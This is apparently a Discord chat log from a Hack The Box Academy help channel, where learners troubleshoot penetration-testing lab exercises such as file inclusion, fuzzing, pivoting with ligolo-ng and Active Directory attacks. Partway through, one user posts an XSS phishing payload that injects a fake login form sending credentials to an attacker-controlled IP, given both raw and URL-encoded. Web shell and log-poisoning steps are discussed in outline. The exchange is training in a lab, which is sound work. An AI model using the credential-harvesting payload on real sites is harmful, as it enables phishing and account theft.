Hi, could anyone guide me a bit regarding the File Inclusion Skills Assessment? I've made all the way it to the point where I only need perform Server Log Poisoning, place a Web Shell there and then access ist; the php code just doesn't get displayed or executed

Are you looking in the right spot for your shell?

hey I just realized that my discord is pulling in my old HTB account that I haven't used, not my current active one, any way to change that?

you could probably just leave the server, come back, and reverify

but wrong place to ask this

tried that

alright, ill ask support

I was going to say #1024429874246590575 is a better place for this 🙃

Got it now, was indeed looking in the false spot ... or to be exactly, I just didn't find the output anymore, because it was being displayed right within the logs, so impossible to find without some highlighting along with the injection

thats what eyeballs are for

yes

is it the 10 million wordlist

try it

all other ones would make no sense

if my target wouldn't always need to be reset

Hi is anyone able to help me with sau

#1127297095771099136
If you have no access, read and follow #welcome

target was down again

same issue as before

something is shot with my FFUF - Skills Assessment - Web Fuzzing my results for question 1 return test, archive, faculty , non correct answer, hints for wordlists please.?

Finally !!!!

@mortal shadow any hints for me on Skills Assessment - Web Fuzzing - wordlists to use?

which question

1

link

pls

i get archive, test and faculty as return - https://academy.hackthebox.com/module/54/section/511

try different formatting

LOLz

No way man my engrish suc

I am a🥜

@mortal shadow thanks man \o/

someone could help me setting up ligolo-ng? I have always used socks or chisel

Hii all

https://4pfsec.com/ligolo

ty

can I DM someone about AD Attacks and Enumeration module? "Apply what was taught in this section to gain a shell on DC01. Submit the contents of flag.txt located in the DailyTasks directory on the Administrator's desktop"

DM

very cool module

https://academy.hackthebox.com/module/details/41

@slender shoal
https://eatthebuffet.github.io/posts/Pivoting-with-ligolo/

https://tenor.com/view/its-a-me-mario-it-me-super-mario-nintendo-gif-12848561

Linux Priv Escalation.

Logrotate.

I wget transferred all of the files for logrotten to the target. I compiled, created the payload, but when i run this code. I get an error.

I am stuck on attacking common service! I scan the machine and I got Apache web server! When I scan smtp user name, I found a user but I can’t crack the password of username! Can anyone help me please?

https://academy.hackthebox.com/module/103/section/984
is ```document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

getting hella different outputs when exectuing 1:1 same code

literally following the guide 1:1

i don't get it

Right but why is that?

cause the file doesnt exist

I stepped away from my pc but I ran logrotate -v to ensure it was installed. It gave me a version that was susceptible to the exploit.

Which would imply the file should existV

http://10.129.81.95/phishing/send.php?url=document.write(%27%3Ch3%3EPlease%20login%20to%20continue%3C/h3%3E%3Cform%20action=http://94.237.60.187:75%3E%3Cinput%20type=%22username%22%20name=%22username%22%20placeholder=%22Username%22%3E%3Cinput%20type=%22password%22%20name=%22password%22%20placeholder=%22Password%22%3E%3Cinput%20type=%22submit%22%20name=%22submit%22%20value=%22Login%22%3E%3C/form%3E%27);document.getElementById(%27urlform%27).remove();

rip @rustic sage

Can anyone help with logging into the smb share in service scanning. I tried using bob:Welcome1 with a capital B aswell. I think its to do with the workgroup but I cannot enumerate this as the smb os discovery nmap script returns nothing.

Echo “cause the file doesn’t exist”

if bob is a member of the domain you need to specify the domain. If its bot part of the domain then presuming youre using crackmapexec you need to specify --local-auth

Nevermind I tried attempting this section in 25 mins so I’ll just try it again. Maybe I missed something.

I was trying smbclient as that is what the guide used. Still can't login with crackmapexec. Do you have any other ideas?

People i have a question: I just completed the module Shells & Payloads. For the Host 3 on the Capstone exercise i had access denied to the administrator folder so i had to privesc. This is the intended path??? All this pivoting and Windows priv esc??

The website for the Responder module is down and I can't move on to tier two in starting point

this isnt for starting point discussion

verify your account in #welcome to gain access to a more relevant channel

thx

@thorn urchincan you help me with a question

not without knowing the question

@thorn urchini want to know does windows update ask for pin and userid to restart for a update

like after restart or before restart

@thorn urchinbefore

not that I ever recall no

@thorn urchinbut i was asked to give my pin and userid to restart my windows and i gave it to restart for update

¯_(ツ)_/¯

idk your settings

also what module relevance does this have

i don't see any general chat room or revelant chat room

and i am scared now

Then perhaps reading #welcome is useful

what to do in welcome?

It can be implemented as a security feature. Or depending on the required update its benign. Sometimes windows is stupid

@fathom pendantcan it be a malware too?

Read and comprehend what it's telling you

i was dumb enough to restart it

Login to your HTB Account

i don't have htb account

Then make one

It takes less than 5 minutes

@fathom pendantwill it unlocks genernal chat?

It unlocks the rest of the server.

They say in the skills assessment that there's more than one way to do it, and that is one way

There is also a way to do it without privilege escalation, and you can DM about that if you want to

Also, I don't recall any pivoting needed unless you're trying to proxy your own VM through the foothold/parrot host that they give you

Hello guys, have you ever had this error with kerberos, using gettgtpkinit.py : "Error Name: KDC_ERR_PADATA_TYPE_NOSUPP Detail: "KDC has no support for PADATA type (pre-authentication data)" ?

yup thats a pretty notorious issue

Theres not good fixes cause its not really well understood what causes it.

Sometimes can just be timing issues and you need to resync to the DC but other times your SoL without knowing some inane workarounds that only situationally work

98% of the time if you see it on HTB its cause somethings broken :/

Hey guys i'm having trouble installing PSWindow update i'm getting this weird error can anyone help?

Okkk thanks for the reply, I was debugging to find why it wouldn't authenticate me !

Alh4zr3d got that error while doing the insane box Horus and got so frustrated that he was doing everything correctly but the box was just broken that he went out to become an ADCS expert and started making an ADCS hacking course just to prove he knew what he was doing on the box.

Thats how much of a malder that error can be

goat behavior honestly

Sometimes I get second hand embarrassment when he gets too frustrated doing a machine on stream, but dudes overall pretty cool and a big inspiration

damn now i see why vhosts are needed, but why do people use the FQDN (inlanefreight.local for example)

but doing an insane box live on stream when viewers expect him to get it all correct within 3 hours and have the benefit of walkthroughs while he doesnt use em AND the more complicated the box the more likely it breaks when being retired? yeah I get why he gets mad

someone know why proxy doesn't get installed?

$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go```

I used that commands to install ligolo-ng, the agent got installed but the proxy not

What do you mean by installed?

you dont install ligolo

it builds standalones

I have killed the VPN process in my machine but the module doesn't turn off

When I try to start another machine, it asks me for turn off the first machine, but It doesn't turn off

Anyone knows what to do?

I just cloned the directory on my local machine with go 1.19.8 and managed to build the proxy with the given command

clear cache, restart browser

but it doesn't let me build the proxy files

looks like your go version is out of date

Same thing

their go version is more recent than mine, so I'm not sure if something is borked with their go installation or what

did that and terminated the previous machine?

I am not even connected to the VPN and the machine is already ON

it is 1.20.5

In the github it says I need 1.17+

the error has nothing to do with your vpn connection

maybe your go is TOO new

maybe

I did full-upgrade yesterday

Why? As far as I know I need to be connected to the VPN to be able to connect to the machine and resolve it

oof never do full-upgrade

😬

https://github.com/nicocha30/ligolo-ng/issues/32

By VPN I mean Starting Point

full-upgrade updates everything even if its dependency breaking

its a great way to break your vm

Checking the issues on a github repository is a good troubleshooting step to see if people have had similar issues 😉

yes but that error is about a machine instance running which is independent of your vpn connection

Oh, alrighr

I can have a box running without being on the vpn and I can be on the vpn without a box running

Sounds reasonable

also this channel isnt for starting point, read #welcome to verify your account and access more appropriate channels

ty

am installing other go version

Who has done the Kerberos Attacks I can't seem to get past any of the delegation past unconstrained delegation computers.
trying to follow along just lead to failure I feel stupid

am gonna try now

oh wait I'm stupid

I'm always stupid

the hacking cycle continues

ty for the help it worked

wait that didn't work. I give up

the cycle continues

I don't understand delegation

me either, its on my to do list

Is there going to be any point when Sapphire tickets and Diamond Tickets will be added to kerberos attacks?

Is is there really no point with Silver and Golden tickets being really all you need?

@thorn urchin sorry 1 question. After installing the agent and proxy, I can delete the other files right?

you dont install them, theyre standalones

and idk I dont delete the other stuff

Took me practically all day to complete the easy and medium skills assessments at the end of the Foot-Printing module. Hopefully the hard one doesn't take up my whole day tomorrow.

yea true, then they shouldn't relay in other dependencies after setting them up

I liked the footprinting skill assessments

shouldnt but Ive seen some people run into such issues anyways

and the speed for scanning is the same than with proxychains?

that sounds like something that requires specialized accessibility knowledge, so unlikely

faster

Yeah they are kinda fun. If it took me 1 day to complete the first 2 challenges. Going at that speed will I be in good shape by the time I get to the CPTS exam @thorn urchin ?

I dunno, everyones speed and pace is different

¯_(ツ)_/¯

you can use a plugin to help for that

Did you figure this out? I am getting the same error.

Not sure what to do at this point or what I could do since its something with the DC/environment

good thanks 🙂

last thing im missing:
https://academy.hackthebox.com/module/17/section/64
Submit the contents of the flag file in the directory with directory listing enabled.
i found:
http://blog.inlanefreight.local/wp-content/plugins/email-subscribers/public/
http://blog.inlanefreight.local/wp-content/plugins/the-events-calendar/
not working http://blog.inlanefreight.local/wp-content/plugins/site-editor/

would be cool if anyone could help, really wanna go to bed xd

I'm confused on how to use the PrintSpoofer from github. I'm in the Exploitation and Privilege Escalation section in Attacking Enterprise Networks. I have the app downloaded to my VM, but there's no .exe file inside the directory. Is there something I'm missing here? Never mind. I figured out that you need to get the .exe from a different repository on github.

i did

no way

i should really start to properly read things

wp was hella fun

I am hoping somene can help me for the Bleeding Edge Vulnerabilities in the AD Attacks module.

is there anyway to do the CBBH exam for less than 220€?

with VAT

you know what i mean haha

anyone can help with linux privilege escalation

i literally can't find anything

There are a few ways to do that one afaik, one thing that helps is to straight up ask yourself or write down what you’ve done, and then step back and ask what stone you haven’t turned yet

The whole system is fair game, so don’t restrict yourself to what the section tells you to do

my session in ligolo-ng finished, how can I remove it to make a tunnel again?

Look at the man page for ip, you have resources to search for these things

ty

Just got the flag in the White Box Attacks: Remote Code Execution portion (after a lot of trial-and-error). Anyone who has done this get an actual remote shell, or just code execution to read the flag?

does anyone know what sekurlsa stands for?

Hello, i have a problem

local security authority

thanks, but where is “sekur”?

Can you help me with a problem?

I have recently started with htb but when starting a new machine I get a notice saying that before starting that machine I must turn off another but I do not have any more on.

Says: you must stop Your active machine before spawning another one

Thanks

Still stuck? You can dm me.

Also read #welcome it'll help you access more channels

nah i got it

thats crazy tho

i didnt try to do all that cause it didnt make sense for it to want us to do an entire chain as the first module in the module

like it makes no sense they expect a beginner to know to do all that imo

if you don't know content of the file, you may search for the file for the rest of your life, I used ||grep ||

did you try any different method?

dude i did it the hard way

i rooted the box

LMAOOo#

lulz

well done

I guess rooting was the intended way anyway

Hi

Hi

Hey everyone, Im excited to be back to HTB Academy. When I was last working on the info gathering module I got stuck on zones section.

Hi all! Please help!! I am stuck at Living off the Land module, third question: "Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.". Any ideas how this flag looks like?? dsquery command with ldap filters print out nothing. What am i doing wrong?

I’m completely new and I’ve been enjoying everything so far even tho it’s frustrating at times

so server cant find inlanefrieght.htb i know im doing something wrong cause i had this issue when i first started. What is it? I added the target to the etc/hosts file.

hello, is it normal i find flags on a machine that i am not supposed to find?

maybe?
just happen on me today lol

If you are doing Academy courses they use the same things for different modules. So you will likely find that flags to later questions or other modules. I had that happen before. I was very confused

damn

is there anyway to go from a reverse shell in root to a rdp connection easily?

Password Attacks Lab - Easy

i cant find the flag

that sentence suprases my knowledge sorry

np

I figured out what i was doing wrong...

im struggling with just the intro stuff right now lol

ah hen i can help you if youd like

why do u need an rdp connection?

i think i just caught myself up. its been like a year since i was last subbed to academy

idk easier to find the flag if there are some programs on the machine which requires a gui?

isnt the flag the password for the root user

or maybe i dumb

i found that

i feel this way alot on academy lol

im trying to submit that edit: wrong flag

not working

make sure u dont leave any spaces at the end

nope

u can dm me to check it if u like

i lied im stuck again

i cant remember how i got the FQDN for inlanefreight

I already have the answer. i just cant remember how i got there

@latent sigil you still around?

Not really I'm headed to sleep

But what's up

I already have the answer for the getting the FQDN of the nameserver but i cant remember how I got there. I answered it ages ago

What module

info gathering web edition

my nslookup flags that it cant find inlanefreight.htb: NXDOMAIN

What question

I don't really use nslookup

Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer.

I used dig

honestly the whole module doesnt mention FQDN at all i dont think so.

dig actualy gives me output but i dont see the fqdn

Oh ok

I found your question

Nameservers are different from the normal domain

So the question is asking you to submit the subdomain+ domain of the nameserver

That's what fqdn

Fully qualified domain name if I remember correctly

ok so i need to remember how to find the nameserver

A simple dig all should do the trick

im starting to think im so rusty i need to just start from the beginning again lol

I mean you can reread the modules quickly

Or the cheat sheets

But imo I don't like dns

Even though it might seem as easy for some people

so dig will give the namserver?

Took me a while to understand

Hint: the name server is there when you do a normal dig of the main domain name

Dm me where you're at

ok standby

I have a question regarding pass the hash challenge question 4. ||To get the flag I authenticate as the admin and then perform the pass the hash attack with davids hash, this opens a new command prompt where I can then use the type command to retrieve the flag. ||However if I just authenticate as ||david ||via rdp I get access denied & the same as if I just try to type the flag out as the ||admin||? Why is this, if I am using ||davids|| hash does this not imply he already has access rights? And as ||an admin|| would I not have rights accross the board? Struggling to wrap my head around why we have to chain these attacks to get the credentials for an access rights perspective.

Linux priv. escalation -> Linux Services & Internals Enumeration -> What is the latest Python version that is installed on the target?

Python 3.8.10 whenever i get the version from the remote system

but the answer is not accepted.

Found the answer in the binary files instead of in version via other ways

you could have used also whereis

I also ever got stuck on this question, but someone point out to me that it ask for the 'latest installed version', not 'the one you used'

Doing Documentation & Reporting Practice Lab - been stuck for 3-5 hours
trying to achieve Domain Admin level access, submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host.
I have collected users, passwords and cracked hashes, such as svc_vmwaresso, solarwindsmonitor, svc_vmwaresso, and ADMIN (ipmi_hash), etc..
and found other users such as librarian, and tried password spraying, and didn't get anything.
Using {PsExec + proxychains} for DEV01 and FILE01, and investigated the system and found nothing really useful
please help me if you can, thanks!!

Thanks for the extra way! Noted 🙂

linux priv. escalation ->path abuse -> Review the PATH of the htb-student user. What non-default directory is part of the user's PATH?

Anyone a hint? tried several options but none were accepted as good answer.

or hint about the way it should be noted, since this is mostly the problem

SOLVED!!

what ._.

https://www.reddit.com/r/hackthebox/comments/u8u4w7/pwnbox_not_working_shows_desktop_then_turns_grey/
anyone knows how to fix this problem?

Look at the path variable

I've got the same problem with the in-browser, no trouble when i use the full screen / normal browser version. All the cosy things make the pwnbox blackout, auto resize to in-browser (while full screen). Only the normal way works for me

Yes, by reaching out to support

sure

||have you tried responder?||

https://academy.hackthebox.com/achievement/badge/8c9447fd-2091-11ee-acfc-bea50ffe6cb4

https://academy.hackthebox.com/achievement/badge/8c9447fd-2091-11ee-acfc-bea50ffe6cb4

and it should work

let me try that

i got blank bage

but the request went through, am i right ?

yes but I got blank page

what I mean is I forwarded it

then it's blank

changing the content type was the issue that you were having, and i think it has been solved

?

but what the next step should look like, that i am not aware of

I'm supposed to get a webshell obviously I said it's from the webshells module

The response should tell you where the webshell was uploaded to

what response?

When you forwarded your request?

the page isn't responding it's just white

Then your webshell isn't correct

Or you're not doing something right

If using php are you doing ?cmd=

I downloaded the right webshell I didn't alter anything except the forwarding request

still nothing. Anyone else more than the hint from MarcieLee?

Or ?{var in your php shell}=

in general you should execute your experimental payloads in repeater, did you do that ?

What are default directories

no the module says intercept

i gave the answer that came up with pwd but the answer wasnt correct

...

Are you accessing the page in burp

Pwd isn't the PATH.

Google environment variables

Are you accessing via burp and is intercept still on

even when it was off it still blank

HTB never tells you to follow a specific way or use a specific tool, it only showcases a certain method or a certain way, and it's up to you to use it or not
of course it's always easier to use the presented way or explanation, and most likely it will work but sometimes you could try whatever, there's no *HTB-Police *

let me try the repeater tool then

It's going to be blank unless you specify a command, change your code to execute the command "whoami" to see if it's even working